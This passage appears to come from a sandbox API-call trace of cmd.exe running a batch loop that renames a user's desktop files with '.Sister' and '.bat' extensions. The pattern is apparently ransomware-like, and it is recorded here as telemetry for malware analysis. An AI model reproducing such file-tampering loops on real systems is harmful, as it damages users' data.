"c:\\users\\fd1hvy\\desktop\\cusersharlan4096desktop11-04-2020#cs fun - mwtfun.exe.sister")) returned 0xffffffff [0202.771] GetLastError () returned 0x2 [0202.771] GetProcessHeap () returned 0x21ed8c70000 [0202.771] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0xffde) returned 0x21ed9a86450 [0202.771] GetCurrentDirectoryW (in: nBufferLength=0x7fe7, lpBuffer=0x21ed9a86460 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop") returned 0x17 [0202.771] SetErrorMode (uMode=0x0) returned 0x0 [0202.771] SetErrorMode (uMode=0x1) returned 0x0 [0202.771] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe.Sister", nBufferLength=0x7fe7, lpBuffer=0x21ed975fcc0, lpFilePart=0xa6cf4fd230 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop\\CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe.Sister", lpFilePart=0xa6cf4fd230*="CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe.Sister") returned 0x54 [0202.771] SetErrorMode (uMode=0x0) returned 0x1 [0202.771] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Desktop" (normalized: "c:\\users\\fd1hvy\\desktop")) returned 0x11 [0202.771] GetProcessHeap () returned 0x21ed8c70000 [0202.771] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x260) returned 0x21ed9575b50 [0202.772] _wcsicmp (_String1="CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe.Sister", _String2=".") returned 53 [0202.772] _wcsicmp (_String1="CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe.Sister", _String2="..") returned 53 [0202.772] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe.Sister" (normalized: "c:\\users\\fd1hvy\\desktop\\cusersharlan4096desktop11-04-2020#cs fun - mwtfun.exe.sister")) returned 0xffffffff [0202.772] GetLastError () returned 0x2 [0202.772] ??_V@YAXPEAX@Z () returned 0x1 [0202.772] malloc (_Size=0xffce) returned 0x21ed975fcc0 [0202.772] ??_V@YAXPEAX@Z () returned 0x21ed975fcc0 [0202.772] malloc (_Size=0xffce) returned 0x21ed976fca0 [0202.772] ??_V@YAXPEAX@Z () returned 0x21ed976fca0 [0202.772] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe.Sister" (normalized: "c:\\users\\fd1hvy\\desktop\\cusersharlan4096desktop11-04-2020#cs fun - mwtfun.exe.sister")) returned 0xffffffff [0202.772] GetLastError () returned 0x2 [0202.772] _get_osfhandle (_FileHandle=2) returned 0x54 [0202.772] GetFileType (hFile=0x54) returned 0x2 [0202.772] GetStdHandle (nStdHandle=0xfffffff4) returned 0x54 [0202.772] GetConsoleMode (in: hConsoleHandle=0x54, lpMode=0xa6cf4fd378 | out: lpMode=0xa6cf4fd378) returned 1 [0202.773] _get_osfhandle (_FileHandle=2) returned 0x54 [0202.773] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x54, lpConsoleScreenBufferInfo=0xa6cf4fd3b0 | out: lpConsoleScreenBufferInfo=0xa6cf4fd3b0) returned 1 [0202.773] FormatMessageW (in: dwFlags=0x1a00, lpSource=0x0, dwMessageId=0x2, dwLanguageId=0x0, lpBuffer=0x7ff66c5d7f60, nSize=0x2000, Arguments=0x0 | out: lpBuffer="The system cannot find the file specified.\r\n") returned 0x2c [0202.773] FormatMessageW (in: dwFlags=0x1800, lpSource=0x0, dwMessageId=0x2, dwLanguageId=0x0, lpBuffer=0x7ff66c5d7f60, nSize=0x2000, Arguments=0xa6cf4fd450 | out: lpBuffer="The system cannot find the file specified.\r\n") returned 0x2c [0202.773] WriteConsoleW (in: hConsoleOutput=0x54, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x2c, lpNumberOfCharsWritten=0xa6cf4fd3a0, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fd3a0*=0x2c) returned 1 [0202.777] longjmp () [0202.777] ??_V@YAXPEAX@Z () returned 0x1 [0202.777] FindNextFileW (in: hFindFile=0x21ed8c7cac0, lpFindFileData=0xa6cf4fe640 | out: lpFindFileData=0xa6cf4fe640*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4af0ff20, ftCreationTime.dwHighDateTime=0x1d5eaf6, ftLastAccessTime.dwLowDateTime=0x51221bc0, ftLastAccessTime.dwHighDateTime=0x1d5ed64, ftLastWriteTime.dwLowDateTime=0x51221bc0, ftLastWriteTime.dwHighDateTime=0x1d5ed64, nFileSizeHigh=0x0, nFileSizeLow=0x7a94, dwReserved0=0x0, dwReserved1=0xd8c00000, cFileName="zuXa5tA1VeTtCxZv.gif", cAlternateFileName="")) returned 1 [0202.777] GetProcessHeap () returned 0x21ed8c70000 [0202.777] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed9a75f00, Size=0x572) returned 0x21ed9a96440 [0202.778] GetProcessHeap () returned 0x21ed8c70000 [0202.778] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed9a96440) returned 0x572 [0202.778] GetProcessHeap () returned 0x21ed8c70000 [0202.778] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x4012) returned 0x21ed9578e90 [0202.778] GetProcessHeap () returned 0x21ed8c70000 [0202.778] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed9578e90, Size=0x30) returned 0x21ed9578e90 [0202.778] GetProcessHeap () returned 0x21ed8c70000 [0202.778] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed9578e90) returned 0x30 [0202.778] GetProcessHeap () returned 0x21ed8c70000 [0202.778] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x4012) returned 0x21ed9578ed0 [0202.778] malloc (_Size=0x1ff9c) returned 0x21ed977fc80 [0202.781] GetProcessHeap () returned 0x21ed8c70000 [0202.781] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x3a) returned 0x21ed8d6ec20 [0202.781] ??_V@YAXPEAX@Z () returned 0x1 [0202.781] GetProcessHeap () returned 0x21ed8c70000 [0202.781] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed9578ed0, Size=0x1c0) returned 0x21ed9578ed0 [0202.781] GetProcessHeap () returned 0x21ed8c70000 [0202.781] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed9578ed0) returned 0x1c0 [0202.781] GetProcessHeap () returned 0x21ed8c70000 [0202.781] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x4012) returned 0x21ed95790a0 [0202.781] GetProcessHeap () returned 0x21ed8c70000 [0202.781] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed95790a0, Size=0x290) returned 0x21ed95790a0 [0202.781] GetProcessHeap () returned 0x21ed8c70000 [0202.781] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed95790a0) returned 0x290 [0202.781] GetProcessHeap () returned 0x21ed8c70000 [0202.781] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x4012) returned 0x21ed9579340 [0202.782] GetProcessHeap () returned 0x21ed8c70000 [0202.782] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed9579340, Size=0x30) returned 0x21ed9579340 [0202.782] GetProcessHeap () returned 0x21ed8c70000 [0202.782] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed9579340) returned 0x30 [0202.782] GetProcessHeap () returned 0x21ed8c70000 [0202.782] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x4012) returned 0x21ed9579380 [0202.782] malloc (_Size=0x1ff9c) returned 0x21ed977fc80 [0202.782] GetProcessHeap () returned 0x21ed8c70000 [0202.782] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x3a) returned 0x21ed8d6ebd0 [0202.782] ??_V@YAXPEAX@Z () returned 0x1 [0202.782] malloc (_Size=0x1ff9c) returned 0x21ed977fc80 [0202.782] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0xa6cf4fdef0 | out: lpFindFileData=0xa6cf4fdef0*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x6c4849dd, ftCreationTime.dwHighDateTime=0x1d29fdc, ftLastAccessTime.dwLowDateTime=0x475bb883, ftLastAccessTime.dwHighDateTime=0x1d32742, ftLastWriteTime.dwLowDateTime=0x475bb883, ftLastWriteTime.dwHighDateTime=0x1d32742, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x4, dwReserved1=0x80, cFileName="Users", cAlternateFileName="")) returned 0x21ed9a140a0 [0202.782] FindClose (in: hFindFile=0x21ed9a140a0 | out: hFindFile=0x21ed9a140a0) returned 1 [0202.783] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy", lpFindFileData=0xa6cf4fdef0 | out: lpFindFileData=0xa6cf4fdef0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x20fc850f, ftCreationTime.dwHighDateTime=0x1d32742, ftLastAccessTime.dwLowDateTime=0x9de5855d, ftLastAccessTime.dwHighDateTime=0x1d32744, ftLastWriteTime.dwLowDateTime=0x9de5855d, ftLastWriteTime.dwHighDateTime=0x1d32744, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x4, dwReserved1=0x80, cFileName="FD1HVy", cAlternateFileName="")) returned 0x21ed9a140a0 [0202.783] FindClose (in: hFindFile=0x21ed9a140a0 | out: hFindFile=0x21ed9a140a0) returned 1 [0202.783] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop", lpFindFileData=0xa6cf4fdef0 | out: lpFindFileData=0xa6cf4fdef0*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x3476bd48, ftCreationTime.dwHighDateTime=0x1d32722, ftLastAccessTime.dwLowDateTime=0xa372679a, ftLastAccessTime.dwHighDateTime=0x1d6141f, ftLastWriteTime.dwLowDateTime=0xa372679a, ftLastWriteTime.dwHighDateTime=0x1d6141f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x4, dwReserved1=0x80, cFileName="Desktop", cAlternateFileName="")) returned 0x21ed9a143a0 [0202.783] FindClose (in: hFindFile=0x21ed9a143a0 | out: hFindFile=0x21ed9a143a0) returned 1 [0202.783] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\zuXa5tA1VeTtCxZv.gif", lpFindFileData=0xa6cf4fdef0 | out: lpFindFileData=0xa6cf4fdef0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4af0ff20, ftCreationTime.dwHighDateTime=0x1d5eaf6, ftLastAccessTime.dwLowDateTime=0x51221bc0, ftLastAccessTime.dwHighDateTime=0x1d5ed64, ftLastWriteTime.dwLowDateTime=0x51221bc0, ftLastWriteTime.dwHighDateTime=0x1d5ed64, nFileSizeHigh=0x0, nFileSizeLow=0x7a94, dwReserved0=0x4, dwReserved1=0x80, cFileName="zuXa5tA1VeTtCxZv.gif", cAlternateFileName="ZUXA5T~1.GIF")) returned 0x21ed9a14ac0 [0202.783] FindClose (in: hFindFile=0x21ed9a14ac0 | out: hFindFile=0x21ed9a14ac0) returned 1 [0202.784] _wcsnicmp (_String1="ZUXA5T~1.GIF", _String2="zuXa5tA1VeTtCxZv.gif", _MaxCount=0x14) returned 29 [0202.784] malloc (_Size=0x1ff9c) returned 0x21ed979fc30 [0202.785] ??_V@YAXPEAX@Z () returned 0x21ed979fc30 [0202.786] GetProcessHeap () returned 0x21ed8c70000 [0202.786] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x32) returned 0x21ed937ae70 [0202.786] ??_V@YAXPEAX@Z () returned 0x1 [0202.786] ??_V@YAXPEAX@Z () returned 0x1 [0202.786] GetProcessHeap () returned 0x21ed8c70000 [0202.786] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed9579380, Size=0x1c0) returned 0x21ed9579380 [0202.786] GetProcessHeap () returned 0x21ed8c70000 [0202.786] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed9579380) returned 0x1c0 [0202.786] _vsnwprintf (in: _Buffer=0x7ff66c5d7f60, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0xa6cf4fe2b8 | out: _Buffer="\r\n") returned 2 [0202.786] _get_osfhandle (_FileHandle=1) returned 0x50 [0202.786] GetFileType (hFile=0x50) returned 0x2 [0202.786] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0202.787] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe248 | out: lpMode=0xa6cf4fe248) returned 1 [0202.791] _get_osfhandle (_FileHandle=1) returned 0x50 [0202.791] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0xa6cf4fe288, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fe288*=0x2) returned 1 [0202.796] GetCurrentDirectoryW (in: nBufferLength=0x7fe7, lpBuffer=0x21ed8e50080 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop") returned 0x17 [0202.796] _vsnwprintf (in: _Buffer=0x21ed8e80160, _BufferCount=0x83e5, _Format="%s", _ArgList=0xa6cf4fe2c8 | out: _Buffer="C:\\Users\\FD1HVy\\Desktop") returned 23 [0202.796] _vsnwprintf (in: _Buffer=0x21ed8e8018e, _BufferCount=0x83ce, _Format="%c", _ArgList=0xa6cf4fe2c8 | out: _Buffer=">") returned 1 [0202.796] _get_osfhandle (_FileHandle=1) returned 0x50 [0202.796] GetFileType (hFile=0x50) returned 0x2 [0202.797] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0202.797] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe278 | out: lpMode=0xa6cf4fe278) returned 1 [0202.797] _get_osfhandle (_FileHandle=1) returned 0x50 [0202.797] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x21ed8e80160*, nNumberOfCharsToWrite=0x18, lpNumberOfCharsWritten=0xa6cf4fe2b8, lpReserved=0x0 | out: lpBuffer=0x21ed8e80160*, lpNumberOfCharsWritten=0xa6cf4fe2b8*=0x18) returned 1 [0202.797] _get_osfhandle (_FileHandle=1) returned 0x50 [0202.797] GetFileType (hFile=0x50) returned 0x2 [0202.797] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0202.797] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe4e8 | out: lpMode=0xa6cf4fe4e8) returned 1 [0202.798] _get_osfhandle (_FileHandle=1) returned 0x50 [0202.798] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x21ed9578ea0*, nNumberOfCharsToWrite=0x3, lpNumberOfCharsWritten=0xa6cf4fe528, lpReserved=0x0 | out: lpBuffer=0x21ed9578ea0*, lpNumberOfCharsWritten=0xa6cf4fe528*=0x3) returned 1 [0202.798] _vsnwprintf (in: _Buffer=0x7ff66c5d7f60, _BufferCount=0x1fff, _Format="%s ", _ArgList=0xa6cf4fe528 | out: _Buffer=" \"zuXa5tA1VeTtCxZv.gif\" \"zuXa5tA1VeTtCxZv.gif.Sister\" ") returned 54 [0202.798] _get_osfhandle (_FileHandle=1) returned 0x50 [0202.798] GetFileType (hFile=0x50) returned 0x2 [0202.798] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0202.798] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe4b8 | out: lpMode=0xa6cf4fe4b8) returned 1 [0202.799] _get_osfhandle (_FileHandle=1) returned 0x50 [0202.799] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x36, lpNumberOfCharsWritten=0xa6cf4fe4f8, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fe4f8*=0x36) returned 1 [0202.799] _vsnwprintf (in: _Buffer=0x7ff66c5d7f60, _BufferCount=0x1fff, _Format=" %s ", _ArgList=0xa6cf4fe558 | out: _Buffer=" & ") returned 3 [0202.799] _get_osfhandle (_FileHandle=1) returned 0x50 [0202.799] GetFileType (hFile=0x50) returned 0x2 [0202.799] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0202.800] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe4e8 | out: lpMode=0xa6cf4fe4e8) returned 1 [0202.800] _get_osfhandle (_FileHandle=1) returned 0x50 [0202.800] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x3, lpNumberOfCharsWritten=0xa6cf4fe528, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fe528*=0x3) returned 1 [0202.800] _vsnwprintf (in: _Buffer=0x7ff66c5d7f60, _BufferCount=0x1fff, _Format="%.3s", _ArgList=0xa6cf4fe528 | out: _Buffer="for") returned 3 [0202.800] _get_osfhandle (_FileHandle=1) returned 0x50 [0202.800] GetFileType (hFile=0x50) returned 0x2 [0202.800] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0202.800] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe4b8 | out: lpMode=0xa6cf4fe4b8) returned 1 [0202.801] _get_osfhandle (_FileHandle=1) returned 0x50 [0202.801] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x3, lpNumberOfCharsWritten=0xa6cf4fe4f8, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fe4f8*=0x3) returned 1 [0202.802] _vsnwprintf (in: _Buffer=0x7ff66c5d7f60, _BufferCount=0x1fff, _Format=" %s ", _ArgList=0xa6cf4fe528 | out: _Buffer=" %a in ") returned 7 [0202.802] _get_osfhandle (_FileHandle=1) returned 0x50 [0202.802] GetFileType (hFile=0x50) returned 0x2 [0202.802] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0202.803] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe4b8 | out: lpMode=0xa6cf4fe4b8) returned 1 [0202.803] _get_osfhandle (_FileHandle=1) returned 0x50 [0202.803] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x7, lpNumberOfCharsWritten=0xa6cf4fe4f8, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fe4f8*=0x7) returned 1 [0202.803] _vsnwprintf (in: _Buffer=0x7ff66c5d7f60, _BufferCount=0x1fff, _Format="(%s) %s ", _ArgList=0xa6cf4fe528 | out: _Buffer="(\"C:\\Users\\FD1HVy\\Desktop\\CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe\") do ") returned 85 [0202.803] _get_osfhandle (_FileHandle=1) returned 0x50 [0202.804] GetFileType (hFile=0x50) returned 0x2 [0202.804] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0202.804] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe4b8 | out: lpMode=0xa6cf4fe4b8) returned 1 [0202.804] _get_osfhandle (_FileHandle=1) returned 0x50 [0202.804] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x55, lpNumberOfCharsWritten=0xa6cf4fe4f8, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fe4f8*=0x55) returned 1 [0202.809] _get_osfhandle (_FileHandle=1) returned 0x50 [0202.809] GetFileType (hFile=0x50) returned 0x2 [0202.809] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0202.809] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe4e8 | out: lpMode=0xa6cf4fe4e8) returned 1 [0202.810] _get_osfhandle (_FileHandle=1) returned 0x50 [0202.810] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x21ed9579350*, nNumberOfCharsToWrite=0x3, lpNumberOfCharsWritten=0xa6cf4fe528, lpReserved=0x0 | out: lpBuffer=0x21ed9579350*, lpNumberOfCharsWritten=0xa6cf4fe528*=0x3) returned 1 [0202.812] _vsnwprintf (in: _Buffer=0x7ff66c5d7f60, _BufferCount=0x1fff, _Format="%s ", _ArgList=0xa6cf4fe528 | out: _Buffer=" \"zuXa5tA1VeTtCxZv.gif.Sister\" \"zuXa5tA1VeTtCxZv.bat\" ") returned 54 [0202.812] _get_osfhandle (_FileHandle=1) returned 0x50 [0202.812] GetFileType (hFile=0x50) returned 0x2 [0202.812] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0202.812] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe4b8 | out: lpMode=0xa6cf4fe4b8) returned 1 [0202.813] _get_osfhandle (_FileHandle=1) returned 0x50 [0202.813] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x36, lpNumberOfCharsWritten=0xa6cf4fe4f8, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fe4f8*=0x36) returned 1 [0202.813] _vsnwprintf (in: _Buffer=0x7ff66c5d7f60, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0xa6cf4fe5b8 | out: _Buffer="\r\n") returned 2 [0202.813] _get_osfhandle (_FileHandle=1) returned 0x50 [0202.813] GetFileType (hFile=0x50) returned 0x2 [0202.813] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0202.813] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe548 | out: lpMode=0xa6cf4fe548) returned 1 [0202.814] _get_osfhandle (_FileHandle=1) returned 0x50 [0202.814] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0xa6cf4fe588, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fe588*=0x2) returned 1 [0202.818] GetConsoleTitleW (in: lpConsoleTitle=0xa6cf4fe240, nSize=0x104 | out: lpConsoleTitle="C:\\WINDOWS\\sysnative\\cmd.exe") returned 0x1d [0202.819] malloc (_Size=0xffce) returned 0x21ed8ea0920 [0202.819] ??_V@YAXPEAX@Z () returned 0x21ed8ea0920 [0202.819] malloc (_Size=0xffce) returned 0x21ed977fc80 [0202.819] ??_V@YAXPEAX@Z () returned 0x21ed977fc80 [0202.819] _wcsicmp (_String1="ren", _String2="DIR") returned 14 [0202.819] _wcsicmp (_String1="ren", _String2="ERASE") returned 13 [0202.819] _wcsicmp (_String1="ren", _String2="DEL") returned 14 [0202.819] _wcsicmp (_String1="ren", _String2="TYPE") returned -2 [0202.819] _wcsicmp (_String1="ren", _String2="COPY") returned 15 [0202.819] _wcsicmp (_String1="ren", _String2="CD") returned 15 [0202.819] _wcsicmp (_String1="ren", _String2="CHDIR") returned 15 [0202.819] _wcsicmp (_String1="ren", _String2="RENAME") returned -97 [0202.820] _wcsicmp (_String1="ren", _String2="REN") returned 0 [0202.820] ??_V@YAXPEAX@Z () returned 0x1 [0202.820] GetProcessHeap () returned 0x21ed8c70000 [0202.820] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0xe8) returned 0x21ed8d6da70 [0202.820] GetProcessHeap () returned 0x21ed8c70000 [0202.820] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed8d6da70, Size=0x7c) returned 0x21ed8d6da70 [0202.820] GetProcessHeap () returned 0x21ed8c70000 [0202.820] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed8d6da70) returned 0x7c [0202.820] GetProcessHeap () returned 0x21ed8c70000 [0202.820] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x84) returned 0x21ed9379a50 [0202.820] GetProcessHeap () returned 0x21ed8c70000 [0202.820] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0xe8) returned 0x21ed9a559e0 [0202.822] GetProcessHeap () returned 0x21ed8c70000 [0202.822] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed9a559e0, Size=0x7c) returned 0x21ed9a559e0 [0202.822] GetProcessHeap () returned 0x21ed8c70000 [0202.822] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed9a559e0) returned 0x7c [0202.822] malloc (_Size=0xffce) returned 0x21ed977fc80 [0202.822] ??_V@YAXPEAX@Z () returned 0x21ed977fc80 [0202.822] GetProcessHeap () returned 0x21ed8c70000 [0202.822] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x58) returned 0x21ed9a14ac0 [0202.822] GetProcessHeap () returned 0x21ed8c70000 [0202.822] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x260) returned 0x21ed9574a40 [0202.822] _wcsicmp (_String1="zuXa5tA1VeTtCxZv.gif", _String2=".") returned 76 [0202.822] _wcsicmp (_String1="zuXa5tA1VeTtCxZv.gif", _String2="..") returned 76 [0202.822] GetFileAttributesW (lpFileName="zuXa5tA1VeTtCxZv.gif" (normalized: "c:\\users\\fd1hvy\\desktop\\zuxa5ta1vettcxzv.gif")) returned 0x20 [0202.822] GetProcessHeap () returned 0x21ed8c70000 [0202.822] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0xffde) returned 0x21ed9a969c0 [0202.824] GetCurrentDirectoryW (in: nBufferLength=0x7fe7, lpBuffer=0x21ed9a969d0 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop") returned 0x17 [0202.825] SetErrorMode (uMode=0x0) returned 0x0 [0202.825] SetErrorMode (uMode=0x1) returned 0x0 [0202.825] GetFullPathNameW (in: lpFileName="zuXa5tA1VeTtCxZv.gif", nBufferLength=0x7fe7, lpBuffer=0x21ed977fc80, lpFilePart=0xa6cf4fd660 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop\\zuXa5tA1VeTtCxZv.gif", lpFilePart=0xa6cf4fd660*="zuXa5tA1VeTtCxZv.gif") returned 0x2c [0202.825] SetErrorMode (uMode=0x0) returned 0x1 [0202.825] GetProcessHeap () returned 0x21ed8c70000 [0202.825] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x260) returned 0x21ed9575670 [0202.825] _wcsicmp (_String1="zuXa5tA1VeTtCxZv.gif", _String2=".") returned 76 [0202.825] _wcsicmp (_String1="zuXa5tA1VeTtCxZv.gif", _String2="..") returned 76 [0202.825] GetFileAttributesW (lpFileName="zuXa5tA1VeTtCxZv.gif" (normalized: "c:\\users\\fd1hvy\\desktop\\zuxa5ta1vettcxzv.gif")) returned 0x20 [0202.825] ??_V@YAXPEAX@Z () returned 0x1 [0202.825] malloc (_Size=0xffce) returned 0x21ed977fc80 [0202.825] ??_V@YAXPEAX@Z () returned 0x21ed977fc80 [0202.825] malloc (_Size=0xffce) returned 0x21ed978fc60 [0202.826] ??_V@YAXPEAX@Z () returned 0x21ed978fc60 [0202.826] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\zuXa5tA1VeTtCxZv.gif" (normalized: "c:\\users\\fd1hvy\\desktop\\zuxa5ta1vettcxzv.gif")) returned 0x20 [0202.826] malloc (_Size=0xffce) returned 0x21ed979fc40 [0202.826] ??_V@YAXPEAX@Z () returned 0x21ed979fc40 [0202.826] FindFirstFileExW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\zuXa5tA1VeTtCxZv.gif", fInfoLevelId=0x1, lpFindFileData=0x21ed9574a50, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x21ed9574a50) returned 0x21ed9a14520 [0202.826] malloc (_Size=0xffce) returned 0x21ed97afc20 [0202.826] ??_V@YAXPEAX@Z () returned 0x21ed97afc20 [0202.827] ??_V@YAXPEAX@Z () returned 0x1 [0202.827] MoveFileWithProgressW (lpExistingFileName="C:\\Users\\FD1HVy\\Desktop\\zuXa5tA1VeTtCxZv.gif" (normalized: "c:\\users\\fd1hvy\\desktop\\zuxa5ta1vettcxzv.gif"), lpNewFileName="C:\\Users\\FD1HVy\\Desktop\\zuXa5tA1VeTtCxZv.gif.Sister" (normalized: "c:\\users\\fd1hvy\\desktop\\zuxa5ta1vettcxzv.gif.sister"), lpProgressRoutine=0x0, lpData=0x0, dwFlags=0x2) returned 1 [0202.828] FindNextFileW (in: hFindFile=0x21ed9a14520, lpFindFileData=0x21ed9574a50 | out: 